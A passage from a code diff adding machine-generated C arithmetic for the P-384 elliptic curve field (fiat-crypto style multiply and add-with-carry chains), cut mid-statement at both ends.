x51, x88); ++ fiat_secp384r1_addcarryx_u32(&x115, &x116, x114, x53, x90); ++ fiat_secp384r1_addcarryx_u32(&x117, &x118, x116, x55, x92); ++ fiat_secp384r1_addcarryx_u32(&x119, &x120, x118, x57, x94); ++ fiat_secp384r1_addcarryx_u32(&x121, &x122, x120, x59, x96); ++ fiat_secp384r1_mulx_u32(&x123, &x124, x1, (arg2[11])); ++ fiat_secp384r1_mulx_u32(&x125, &x126, x1, (arg2[10])); ++ fiat_secp384r1_mulx_u32(&x127, &x128, x1, (arg2[9])); ++ fiat_secp384r1_mulx_u32(&x129, &x130, x1, (arg2[8])); ++ fiat_secp384r1_mulx_u32(&x131, &x132, x1, (arg2[7])); ++ fiat_secp384r1_mulx_u32(&x133, &x134, x1, (arg2[6])); ++ fiat_secp384r1_mulx_u32(&x135, &x136, x1, (arg2[5])); ++ fiat_secp384r1_mulx_u32(&x137, &x138, x1, (arg2[4])); ++ fiat_secp384r1_mulx_u32(&x139, &x140, x1, (arg2[3])); ++ fiat_secp384r1_mulx_u32(&x141, &x142, x1, (arg2[2])); ++ fiat_secp384r1_mulx_u32(&x143, &x144, x1, (arg2[1])); ++ fiat_secp384r1_mulx_u32(&x145, &x146, x1, (arg2[0])); ++ fiat_secp384r1_addcarryx_u32(&x147, &x148, 0x0, x146, x143); ++ fiat_secp384r1_addcarryx_u32(&x149, &x150, x148, x144, x141); ++ fiat_secp384r1_addcarryx_u32(&x151, &x152, x150, x142, x139); ++ fiat_secp384r1_addcarryx_u32(&x153, &x154, x152, x140, x137); ++ fiat_secp384r1_addcarryx_u32(&x155, &x156, x154, x138, x135); ++ fiat_secp384r1_addcarryx_u32(&x157, &x158, x156, x136, x133); ++ fiat_secp384r1_addcarryx_u32(&x159, &x160, x158, x134, x131); ++ fiat_secp384r1_addcarryx_u32(&x161, &x162, x160, x132, x129); ++ fiat_secp384r1_addcarryx_u32(&x163, &x164, x162, x130, x127); ++ fiat_secp384r1_addcarryx_u32(&x165, &x166, x164, x128, x125); ++ fiat_secp384r1_addcarryx_u32(&x167, &x168, x166, x126, x123); ++ x169 = (x168 + x124); ++ fiat_secp384r1_addcarryx_u32(&x170, &x171, 0x0, x99, x145); ++ fiat_secp384r1_addcarryx_u32(&x172, &x173, x171, x101, x147); ++ fiat_secp384r1_addcarryx_u32(&x174, &x175, x173, x103, x149); ++ fiat_secp384r1_addcarryx_u32(&x176, &x177, x175, x105, x151); ++ fiat_secp384r1_addcarryx_u32(&x178, &x179, x177, x107, x153); ++ fiat_secp384r1_addcarryx_u32(&x180, &x181, x179, x109, x155); ++ fiat_secp384r1_addcarryx_u32(&x182, &x183, x181, x111, x157); ++ fiat_secp384r1_addcarryx_u32(&x184, &x185, x183, x113, x159); ++ fiat_secp384r1_addcarryx_u32(&x186, &x187, x185, x115, x161); ++ fiat_secp384r1_addcarryx_u32(&x188, &x189, x187, x117, x163); ++ fiat_secp384r1_addcarryx_u32(&x190, &x191, x189, x119, x165); ++ fiat_secp384r1_addcarryx_u32(&x192, &x193, x191, x121, x167); ++ fiat_secp384r1_addcarryx_u32(&x194, &x195, x193, x122, x169); ++ fiat_secp384r1_mulx_u32(&x196, &x197, x170, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x198, &x199, x170, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x200, &x201, x170, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x202, &x203, x170, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x204, &x205, x170, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x206, &x207, x170, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x208, &x209, x170, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x210, &x211, x170, UINT32_C(0xfffffffe)); ++ fiat_secp384r1_mulx_u32(&x212, &x213, x170, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x214, &x215, x170, UINT32_C(0xffffffff)); ++ fiat_secp384r1_addcarryx_u32(&x216, &x217, 0x0, x213, x210); ++ fiat_secp384r1_addcarryx_u32(&x218, &x219, x217, x211, x208); ++ fiat_secp384r1_addcarryx_u32(&x220, &x221, x219, x209, x206); ++ fiat_secp384r1_addcarryx_u32(&x222, &x223, x221, x207, x204); ++ fiat_secp384r1_addcarryx_u32(&x224, &x225, x223, x205, x202); ++ fiat_secp384r1_addcarryx_u32(&x226, &x227, x225, x203, x200); ++ fiat_secp384r1_addcarryx_u32(&x228, &x229, x227, x201, x198); ++ fiat_secp384r1_addcarryx_u32(&x230, &x231, x229, x199, x196); ++ x232 = (x231 + x197); ++ fiat_secp384r1_addcarryx_u32(&x233, &x234, 0x0, x170, x214); ++ fiat_secp384r1_addcarryx_u32(&x235, &x236, x234, x172, x215); ++ fiat_secp384r1_addcarryx_u32(&x237, &x238, x236, x174, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x239, &x240, x238, x176, x212); ++ fiat_secp384r1_addcarryx_u32(&x241, &x242, x240, x178, x216); ++ fiat_secp384r1_addcarryx_u32(&x243, &x244, x242, x180, x218); ++ fiat_secp384r1_addcarryx_u32(&x245, &x246, x244, x182, x220); ++ fiat_secp384r1_addcarryx_u32(&x247, &x248, x246, x184, x222); ++ fiat_secp384r1_addcarryx_u32(&x249, &x250, x248, x186, x224); ++ fiat_secp384r1_addcarryx_u32(&x251, &x252, x250, x188, x226); ++ fiat_secp384r1_addcarryx_u32(&x253, &x254, x252, x190, x228); ++ fiat_secp384r1_addcarryx_u32(&x255, &x256, x254, x192, x230); ++ fiat_secp384r1_addcarryx_u32(&x257, &x258, x256, x194, x232); ++ x259 = ((uint32_t)x258 + x195); ++ fiat_secp384r1_mulx_u32(&x260, &x261, x2, (arg2[11])); ++ fiat_secp384r1_mulx_u32(&x262, &x263, x2, (arg2[10])); ++ fiat_secp384r1_mulx_u32(&x264, &x265, x2, (arg2[9])); ++ fiat_secp384r1_mulx_u32(&x266, &x267, x2, (arg2[8])); ++ fiat_secp384r1_mulx_u32(&x268, &x269, x2, (arg2[7])); ++ fiat_secp384r1_mulx_u32(&x270, &x271, x2, (arg2[6])); ++ fiat_secp384r1_mulx_u32(&x272, &x273, x2, (arg2[5])); ++ fiat_secp384r1_mulx_u32(&x274, &x275, x2, (arg2[4])); ++ fiat_secp384r1_mulx_u32(&x276, &x277, x2, (arg2[3])); ++ fiat_secp384r1_mulx_u32(&x278, &x279, x2, (arg2[2])); ++ fiat_secp384r1_mulx_u32(&x280, &x281, x2, (arg2[1])); ++ fiat_secp384r1_mulx_u32(&x282, &x283, x2, (arg2[0])); ++ fiat_secp384r1_addcarryx_u32(&x284, &x285, 0x0, x283, x280); ++ fiat_secp384r1_addcarryx_u32(&x286, &x287, x285, x281, x278); ++ fiat_secp384r1_addcarryx_u32(&x288, &x289, x287, x279, x276); ++ fiat_secp384r1_addcarryx_u32(&x290, &x291, x289, x277, x274); ++ fiat_secp384r1_addcarryx_u32(&x292, &x293, x291, x275, x272); ++ fiat_secp384r1_addcarryx_u32(&x294, &x295, x293, x273, x270); ++ fiat_secp384r1_addcarryx_u32(&x296, &x297, x295, x271, x268); ++ fiat_secp384r1_addcarryx_u32(&x298, &x299, x297, x269, x266); ++ fiat_secp384r1_addcarryx_u32(&x300, &x301, x299, x267, x264); ++ fiat_secp384r1_addcarryx_u32(&x302, &x303, x301, x265, x262); ++ fiat_secp384r1_addcarryx_u32(&x304, &x305, x303, x263, x260); ++ x306 = (x305 + x261); ++ fiat_secp384r1_addcarryx_u32(&x307, &x308, 0x0, x235, x282); ++ fiat_secp384r1_addcarryx_u32(&x309, &x310, x308, x237, x284); ++ fiat_secp384r1_addcarryx_u32(&x311, &x312, x310, x239, x286); ++ fiat_secp384r1_addcarryx_u32(&x313, &x314, x312, x241, x288); ++ fiat_secp384r1_addcarryx_u32(&x315, &x316, x314, x243, x290); ++ fiat_secp384r1_addcarryx_u32(&x317, &x318, x316, x245, x292); ++ fiat_secp384r1_addcarryx_u32(&x319, &x320, x318, x247, x294); ++ fiat_secp384r1_addcarryx_u32(&x321, &x322, x320, x249, x296); ++ fiat_secp384r1_addcarryx_u32(&x323, &x324, x322, x251, x298); ++ fiat_secp384r1_addcarryx_u32(&x325, &x326, x324, x253, x300); ++ fiat_secp384r1_addcarryx_u32(&x327, &x328, x326, x255, x302); ++ fiat_secp384r1_addcarryx_u32(&x329, &x330, x328, x257, x304); ++ fiat_secp384r1_addcarryx_u32(&x331, &x332, x330, x259, x306); ++ fiat_secp384r1_mulx_u32(&x333, &x334, x307, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x335, &x336, x307, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x337, &x338, x307, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x339, &x340, x307, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x341, &x342, x307, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x343, &x344, x307, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x345, &x346, x307, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x347, &x348, x307, UINT32_C(0xfffffffe)); ++ fiat_secp384r1_mulx_u32(&x349, &x350, x307, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x351, &x352, x307, UINT32_C(0xffffffff)); ++ fiat_secp384r1_addcarryx_u32(&x353, &x354, 0x0, x350, x347); ++ fiat_secp384r1_addcarryx_u32(&x355, &x356, x354, x348, x345); ++ fiat_secp384r1_addcarryx_u32(&x357, &x358, x356, x346, x343); ++ fiat_secp384r1_addcarryx_u32(&x359, &x360, x358, x344, x341); ++ fiat_secp384r1_addcarryx_u32(&x361, &x362, x360, x342, x339); ++ fiat_secp384r1_addcarryx_u32(&x363, &x364, x362, x340, x337); ++ fiat_secp384r1_addcarryx_u32(&x365, &x366, x364, x338, x335); ++ fiat_secp384r1_addcarryx_u32(&x367, &x368, x366, x336, x333); ++ x369 = (x368 + x334); ++ fiat_secp384r1_addcarryx_u32(&x370, &x371, 0x0, x307, x351); ++ fiat_secp384r1_addcarryx_u32(&x372, &x373, x371, x309, x352); ++ fiat_secp384r1_addcarryx_u32(&x374, &x375, x373, x311, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x376, &x377, x375, x313, x349); ++ fiat_secp384r1_addcarryx_u32(&x378, &x379, x377, x315, x353); ++ fiat_secp384r1_addcarryx_u32(&x380, &x381, x379, x317, x355); ++ fiat_secp384r1_addcarryx_u32(&x382, &x383, x381, x319, x357); ++ fiat_secp384r1_addcarryx_u32(&x384, &x385, x383, x321, x359); ++ fiat_secp384r1_addcarryx_u32(&x386, &x387, x385, x323, x361); ++ fiat_secp384r1_addcarryx_u32(&x388, &x389, x387, x325, x363); ++ fiat_secp384r1_addcarryx_u32(&x390, &x391, x389, x327, x365); ++ fiat_secp384r1_addcarryx_u32(&x392, &x393, x391, x329, x367); ++ fiat_secp384r1_addcarryx_u32(&x394, &x395, x393, x331, x369); ++ x396 = ((uint32_t)x395 + x332); ++ fiat_secp384r1_mulx_u32(&x397, &x398, x3, (arg2[11])); ++ fiat_secp384r1_mulx_u32(&x399, &x400, x3, (arg2[10])); ++ fiat_secp384r1_mulx_u32(&x401, &x402, x3, (arg2[9])); ++ fiat_secp384r1_mulx_u32(&x403, &x404, x3, (arg2[8])); ++ fiat_secp384r1_mulx_u32(&x405, &x406, x3, (arg2[7])); ++ fiat_secp384r1_mulx_u32(&x407, &x408, x3, (arg2[6])); ++ fiat_secp384r1_mulx_u32(&x409, &x410, x3, (arg2[5])); ++ fiat_secp384r1_mulx_u32(&x411, &x412, x3, (arg2[4])); ++ fiat_secp384r1_mulx_u32(&x413, &x414, x3, (arg2[3])); ++ fiat_secp384r1_mulx_u32(&x415, &x416, x3, (arg2[2])); ++ fiat_secp384r1_mulx_u32(&x417, &x418, x3, (arg2[1])); ++ fiat_secp384r1_mulx_u32(&x419, &x420, x3, (arg2[0])); ++ fiat_secp384r1_addcarryx_u32(&x421, &x422, 0x0, x420, x417); ++ fiat_secp384r1_addcarryx_u32(&x423, &x424, x422, x418, x415); ++ fiat_secp384r1_addcarryx_u32(&x425, &x426, x424, x416, x413); ++ fiat_secp384r1_addcarryx_u32(&x427, &x428, x426, x414, x411); ++ fiat_secp384r1_addcarryx_u32(&x429, &x430, x428, x412, x409); ++ fiat_secp384r1_addcarryx_u32(&x431, &x432, x430, x410, x407); ++ fiat_secp384r1_addcarryx_u32(&x433, &x434, x432, x408, x405); ++ fiat_secp384r1_addcarryx_u32(&x435, &x436, x434, x406, x403); ++ fiat_secp384r1_addcarryx_u32(&x437, &x438, x436, x404, x401); ++ fiat_secp384r1_addcarryx_u32(&x439, &x440, x438, x402, x399); ++ fiat_secp384r1_addcarryx_u32(&x441, &x442, x440, x400, x397); ++ x443 = (x442 + x398); ++ fiat_secp384r1_addcarryx_u32(&x444, &x445, 0x0, x372, x419); ++ fiat_secp384r1_addcarryx_u32(&x446, &x447, x445, x374, x421); ++ fiat_secp384r1_addcarryx_u32(&x448, &x449, x447, x376, x423); ++ fiat_secp384r1_addcarryx_u32(&x450, &x451, x449, x378, x425); ++ fiat_secp384r1_addcarryx_u32(&x452, &x453, x451, x380, x427); ++ fiat_secp384r1_addcarryx_u32(&x454, &x455, x453, x382, x429); ++ fiat_secp384r1_addcarryx_u32(&x456, &x457, x455, x384, x431); ++ fiat_secp384r1_addcarryx_u32(&x458, &x459, x457, x386, x433); ++ fiat_secp384r1_addcarryx_u32(&x460, &x461, x459, x388, x435); ++ fiat_secp384r1_addcarryx_u32(&x462, &x463, x461, x390, x437); ++ fiat_secp384r1_addcarryx_u32(&x464, &x465, x463, x392, x439); ++ fiat_secp384r1_addcarryx_u32(&x466, &x467, x465, x394, x441); ++ fiat_secp384r1_addcarryx_u32(&x468, &x469, x467, x396, x443); ++ fiat_secp384r1_mulx_u32(&x470, &x471, x444, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x472, &x473, x444, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x474, &x475, x444, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x476, &x477, x444, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x478, &x479, x444, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x480, &x481, x444, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x482, &x483, x444, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x484, &x485, x444, UINT32_C(0xfffffffe)); ++ fiat_secp384r1_mulx_u32(&x486, &x487, x444, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x488, &x489, x444, UINT32_C(0xffffffff)); ++ fiat_secp384r1_addcarryx_u32(&x490, &x491, 0x0, x487, x484); ++ fiat_secp384r1_addcarryx_u32(&x492, &x493, x491, x485, x482); ++ fiat_secp384r1_addcarryx_u32(&x494, &x495, x493, x483, x480); ++ fiat_secp384r1_addcarryx_u32(&x496, &x497, x495, x481, x478); ++ fiat_secp384r1_addcarryx_u32(&x498, &x499, x497, x479, x476); ++ fiat_secp384r1_addcarryx_u32(&x500, &x501, x499, x477, x474); ++ fiat_secp384r1_addcarryx_u32(&x502, &x503, x501, x475, x472); ++ fiat_secp384r1_addcarryx_u32(&x504, &x505, x503, x473, x470); ++ x506 = (x505 + x471); ++ fiat_secp384r1_addcarryx_u32(&x507, &x508, 0x0, x444, x488); ++ fiat_secp384r1_addcarryx_u32(&x509, &x510, x508, x446, x489); ++ fiat_secp384r1_addcarryx_u32(&x511, &x512, x510, x448, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x513, &x514, x512, x450, x486); ++ fiat_secp384r1_addcarryx_u32(&x515, &x516, x514, x452, x490); ++ fiat_secp384r1_addcarryx_u32(&x517, &x518, x516, x454, x492); ++ fiat_secp384r1_addcarryx_u32(&x519, &x520, x518, x456, x494); ++ fiat_secp384r1_addcarryx_u32(&x521, &x522, x520, x458, x496); ++ fiat_secp384r1_addcarryx_u32(&x523, &x524, x522, x460, x498); ++ fiat_secp384r1_addcarryx_u32(&x525, &x526, x524, x462, x500); ++ fiat_secp384r1_addcarryx_u32(&x527, &x528, x526, x464, x502); ++ fiat_secp384r1_addcarryx_u32(&x529, &x530, x528, x466, x504); ++ fiat_secp384r1_addcarryx_u32(&x531, &x532, x530, x468, x506); ++ x533 = ((uint32_t)x532 + x469); ++ fiat_secp384r1_mulx_u32(&x534, &x535, x4, (arg2[11])); ++ fiat_secp384r1_mulx_u32(&x536, &x537, x4, (arg2[10])); ++ fiat_secp384r1_mulx_u32(&x538, &x539, x4, (arg2[9])); ++ fiat_secp384r1_mulx_u32(&x540, &x541, x4, (arg2[8])); ++ fiat_secp384r1_mulx_u32(&x542, &x543, x4, (arg2[7])); ++ fiat_secp384r1_mulx_u32(&x544, &x545, x4, (arg2[6])); ++ fiat_secp384r1_mulx_u32(&x546, &x547, x4, (arg2[5])); ++ fiat_secp384r1_mulx_u32(&x548, &x549, x4, (arg2[4])); ++ fiat_secp384r1_mulx_u32(&x550, &x551, x4, (arg2[3])); ++ fiat_secp384r1_mulx_u32(&x552, &x553, x4, (arg2[2])); ++ fiat_secp384r1_mulx_u32(&x554, &x555, x4, (arg2[1])); ++ fiat_secp384r1_mulx_u32(&x556, &x557, x4, (arg2[0])); ++ fiat_secp384r1_addcarryx_u32(&x558, &x559, 0x0, x557, x554); ++ fiat_secp384r1_addcarryx_u32(&x560, &x561, x559, x555, x552); ++ fiat_secp384r1_addcarryx_u32(&x562, &x563, x561, x553, x550); ++ fiat_secp384r1_addcarryx_u32(&x564, &x565, x563, x551, x548); ++ fiat_secp384r1_addcarryx_u32(&x566, &x567, x565, x549, x546); ++ fiat_secp384r1_addcarryx_u32(&x568, &x569, x567, x547, x544); ++ fiat_secp384r1_addcarryx_u32(&x570, &x571, x569, x545, x542); ++ fiat_secp384r1_addcarryx_u32(&x572, &x573, x571, x543, x540); ++ fiat_secp384r1_addcarryx_u32(&x574, &x575, x573, x541, x538); ++ fiat_secp384r1_addcarryx_u32(&x576, &x577, x575, x539, x536); ++ fiat_secp384r1_addcarryx_u32(&x578, &x579, x577, x537, x534); ++ x580 = (x579 + x535); ++ fiat_secp384r1_addcarryx_u32(&x581, &x582, 0x0, x509, x556); ++ fiat_secp384r1_addcarryx_u32(&x583, &x584, x582, x511, x558); ++ fiat_secp384r1_addcarryx_u32(&x585, &x586, x584, x513, x560); ++ fiat_secp384r1_addcarryx_u32(&x587, &x588, x586, x515, x562); ++ fiat_secp384r1_addcarryx_u32(&x589, &x590, x588, x517, x564); ++ fiat_secp384r1_addcarryx_u32(&x591, &x592, x590, x519, x566); ++ fiat_secp384r1_addcarryx_u32(&x593, &x594, x592, x521, x568); ++ fiat_secp384r1_addcarryx_u32(&x595, &x596, x594, x523, x570); ++ fiat_secp384r1_addcarryx_u32(&x597, &x598, x596, x525, x572); ++ fiat_secp384r1_addcarryx_u32(&x599, &x600, x598, x527, x574); ++ fiat_secp384r1_addcarryx_u32(&x601, &x602, x600, x529, x576); ++ fiat_secp384r1_addcarryx_u32(&x603, &x604, x602, x531, x578); ++ fiat_secp384r1_addcarryx_u32(&x605, &x606, x604, x533, x580); ++ fiat_secp384r1_mulx_u32(&x607, &x608, x581, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x609, &x610, x581, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x611, &x612, x581, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x613, &x614, x581, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x615, &x616, x581, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x617, &x618, x581, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x619, &x620, x581, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x621, &x622, x581, UINT32_C(0xfffffffe)); ++ fiat_secp384r1_mulx_u32(&x623, &x624, x581, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x625, &x626, x581, UINT32_C(0xffffffff)); ++ fiat_secp384r1_addcarryx_u32(&x627, &x628, 0x0, x624, x621); ++ fiat_secp384r1_addcarryx_u32(&x629, &x630, x628, x622, x619); ++ fiat_secp384r1_addcarryx_u32(&x631, &x632, x630, x620, x617); ++ fiat_secp384r1_addcarryx_u32(&x633, &x634, x632, x618, x615); ++ fiat_secp384r1_addcarryx_u32(&x635, &x636, x634, x616, x613); ++ fiat_secp384r1_addcarryx_u32(&x637, &x638, x636, x614, x611); ++ fiat_secp384r1_addcarryx_u32(&x639, &x640, x638, x612, x609); ++ fiat_secp384r1_addcarryx_u32(&x641, &x642, x640, x610, x607); ++ x643 = (x642 + x608); ++ fiat_secp384r1_addcarryx_u32(&x644, &x645, 0x0, x581, x625); ++ fiat_secp384r1_addcarryx_u32(&x646, &x647, x645, x583, x626); ++ fiat_secp384r1_addcarryx_u32(&x648, &x649, x647, x585, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x650, &x651, x649, x587, x623); ++ fiat_secp384r1_addcarryx_u32(&x652, &x653, x651, x589, x627); ++ fiat_secp384r1_addcarryx_u32(&x654, &x655, x653, x591, x629); ++ fiat_secp384r1_addcarryx_u32(&x656, &x657, x655, x593, x631); ++ fiat_secp384r1_addcarryx_u32(&x658, &x659, x657, x595, x633); ++ fiat_secp384r1_addcarryx_u32(&x660, &x661, x659, x597, x635); ++ fiat_secp384r1_addcarryx_u32(&x662, &x663, x661, x599, x637); ++ fiat_secp384r1_addcarryx_u32(&x664, &x665, x663, x601, x639); ++ fiat_secp384r1_addcarryx_u32(&x666, &x667, x665, x603, x641); ++ fiat_secp384r1_addcarryx_u32(&x668, &x669, x667, x605, x643); ++ x670 = ((uint32_t)x669 + x606); ++ fiat_secp384r1_mulx_u32(&x671, &x672, x5, (arg2[11])); ++ fiat_secp384r1_mulx_u32(&x673, &x674, x5, (arg2[10])); ++ fiat_secp384r1_mulx_u32(&x675, &x676, x5, (arg2[9])); ++ fiat_secp384r1_mulx_u32(&x677, &x678, x5, (arg2[8])); ++ fiat_secp384r1_mulx_u32(&x679, &x680, x5, (arg2[7])); ++ fiat_secp384r1_mulx_u32(&x681, &x682, x5, (arg2[6])); ++ fiat_secp384r1_mulx_u32(&x683, &x684, x5, (arg2[5])); ++ fiat_secp384r1_mulx_u32(&x685, &x686, x5, (arg2[4])); ++ fiat_secp384r1_mulx_u32(&x687, &x688, x5, (arg2[3])); ++ fiat_secp384r1_mulx_u32(&x689, &x690, x5, (arg2[2])); ++ fiat_secp384r1_mulx_u32(&x691, &x692, x5, (arg2[1])); ++ fiat_secp384r1_mulx_u32(&x693, &x694, x5, (arg2[0])); ++ fiat_secp384r1_addcarryx_u32(&x695, &x696, 0x0, x694, x691); ++ fiat_secp384r1_addcarryx_u32(&x697, &x698, x696, x692, x689); ++ fiat_secp384r1_addcarryx_u32(&x699, &x700, x698, x690, x687); ++ fiat_secp384r1_addcarryx_u32(&x701, &x702, x700, x688, x685); ++ fiat_secp384r1_addcarryx_u32(&x703, &x704, x702, x686, x683); ++ fiat_secp384r1_addcarryx_u32(&x705, &x706, x704, x684, x681); ++ fiat_secp384r1_addcarryx_u32(&x707, &x708, x706, x682, x679); ++ fiat_secp384r1_addcarryx_u32(&x709, &x710, x708, x680, x677); ++ fiat_secp384r1_addcarryx_u32(&x711, &x712, x710, x678, x675); ++ fiat_secp384r1_addcarryx_u32(&x713, &x714, x712, x676, x673); ++ fiat_secp384r1_addcarryx_u32(&x715, &x716, x714, x674, x671); ++ x717 = (x716 + x672); ++ fiat_secp384r1_addcarryx_u32(&x718, &x719, 0x0, x646, x693); ++ fiat_secp384r1_addcarryx_u32(&x720, &x721, x719, x648, x695); ++ fiat_secp384r1_addcarryx_u32(&x722, &x723, x721, x650, x697); ++ fiat_secp384r1_addcarryx_u32(&x724, &x725, x723, x652, x699); ++ fiat_secp384r1_addcarryx_u32(&x726, &x727, x725, x654, x701); ++ fiat_secp384r1_addcarryx_u32(&x728, &x729, x727, x656, x703); ++ fiat_secp384r1_addcarryx_u32(&x730, &x731, x729, x658, x705); ++ fiat_secp384r1_addcarryx_u32(&x732, &x733, x731, x660, x707); ++ fiat_secp384r1_addcarryx_u32(&x734, &x735, x733, x662, x709); ++ fiat_secp384r1_addcarryx_u32(&x736, &x737, x735, x664, x711); ++ fiat_secp384r1_addcarryx_u32(&x738, &x739, x737, x666, x713); ++ fiat_secp384r1_addcarryx_u32(&x740, &x741, x739, x668, x715); ++ fiat_secp384r1_addcarryx_u32(&x742, &x743, x741, x670, x717); ++ fiat_secp384r1_mulx_u32(&x744, &x745, x718, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x746, &x747, x718, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x748, &x749, x718, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x750, &x751, x718, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x752, &x753, x718, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x754, &x755, x718, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x756, &x757, x718, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x758, &x759, x718, UINT32_C(0xfffffffe)); ++ fiat_secp384r1_mulx_u32(&x760, &x761, x718, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x762, &x763, x718, UINT32_C(0xffffffff)); ++ fiat_secp384r1_addcarryx_u32(&x764, &x765, 0x0, x761, x758); ++ fiat_secp384r1_addcarryx_u32(&x766, &x767, x765, x759, x756); ++ fiat_secp384r1_addcarryx_u32(&x768, &x769, x767, x757, x754); ++ fiat_secp384r1_addcarryx_u32(&x770, &x771, x769, x755, x752); ++ fiat_secp384r1_addcarryx_u32(&x772, &x773, x771, x753, x750); ++ fiat_secp384r1_addcarryx_u32(&x774, &x775, x773, x751, x748); ++ fiat_secp384r1_addcarryx_u32(&x776, &x777, x775, x749, x746); ++ fiat_secp384r1_addcarryx_u32(&x778, &x779, x777, x747, x744); ++ x780 = (x779 + x745); ++ fiat_secp384r1_addcarryx_u32(&x781, &x782, 0x0, x718, x762); ++ fiat_secp384r1_addcarryx_u32(&x783, &x784, x782, x720, x763); ++ fiat_secp384r1_addcarryx_u32(&x785, &x786, x784, x722, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x787, &x788, x786, x724, x760); ++ fiat_secp384r1_addcarryx_u32(&x789, &x790, x788, x726, x764); ++ fiat_secp384r1_addcarryx_u32(&x791, &x792, x790, x728, x766); ++ fiat_secp384r1_addcarryx_u32(&x793, &x794, x792, x730, x768); ++ fiat_secp384r1_addcarryx_u32(&x795, &x796, x794, x732, x770); ++ fiat_secp384r1_addcarryx_u32(&x797, &x798, x796, x734, x772); ++ fiat_secp384r1_addcarryx_u32(&x799, &x800, x798, x736, x774); ++ fiat_secp384r1_addcarryx_u32(&x801, &x802, x800, x738, x776); ++ fiat_secp384r1_addcarryx_u32(&x803, &x804, x802, x740, x778); ++ fiat_secp384r1_addcarryx_u32(&x805, &x806, x804, x742, x780); ++ x807 = ((uint32_t)x806 + x743); ++ fiat_secp384r1_mulx_u32(&x808, &x809, x6, (arg2[11])); ++ fiat_secp384r1_mulx_u32(&x810, &x811, x6, (arg2[10])); ++ fiat_secp384r1_mulx_u32(&x812, &x813, x6, (arg2[9])); ++ fiat_secp384r1_mulx_u32(&x814, &x815, x6, (arg2[8])); ++ fiat_secp384r1_mulx_u32(&x816, &x817, x6, (arg2[7])); ++ fiat_secp384r1_mulx_u32(&x818, &x819, x6, (arg2[6])); ++ fiat_secp384r1_mulx_u32(&x820, &x821, x6, (arg2[5])); ++ fiat_secp384r1_mulx_u32(&x822, &x823, x6, (arg2[4])); ++ fiat_secp384r1_mulx_u32(&x824, &x825, x6, (arg2[3])); ++ fiat_secp384r1_mulx_u32(&x826, &x827, x6, (arg2[2])); ++ fiat_secp384r1_mulx_u32(&x828, &x829, x6, (arg2[1])); ++ fiat_secp384r1_mulx_u32(&x830, &x831, x6, (arg2[0])); ++ fiat_secp384r1_addcarryx_u32(&x832, &x833, 0x0, x831, x828); ++ fiat_secp384r1_addcarryx_u32(&x834, &x835, x833, x829, x826); ++ fiat_secp384r1_addcarryx_u32(&x836, &x837, x835, x827, x824); ++ fiat_secp384r1_addcarryx_u32(&x838, &x839, x837, x825, x822); ++ fiat_secp384r1_addcarryx_u32(&x840, &x841, x839, x823, x820); ++ fiat_secp384r1_addcarryx_u32(&x842, &x843, x841, x821, x818); ++ fiat_secp384r1_addcarryx_u32(&x844, &x845, x843, x819, x816); ++ fiat_secp384r1_addcarryx_u32(&x846, &x847, x845, x817, x814); ++ fiat_secp384r1_addcarryx_u32(&x848, &x849, x847, x815, x812); ++ fiat_secp384r1_addcarryx_u32(&x850, &x851, x849, x813, x810); ++ fiat_secp384r1_addcarryx_u32(&x852, &x853, x851, x811, x808); ++ x854 = (x853 + x809); ++ fiat_secp384r1_addcarryx_u32(&x855, &x856, 0x0, x783, x830); ++ fiat_secp384r1_addcarryx_u32(&x857, &x858, x856, x785, x832); ++ fiat_secp384r1_addcarryx_u32(&x859, &x860, x858, x787, x834); ++ fiat_secp384r1_addcarryx_u32(&x861, &x862, x860, x789, x836); ++ fiat_secp384r1_addcarryx_u32(&x863, &x864, x862, 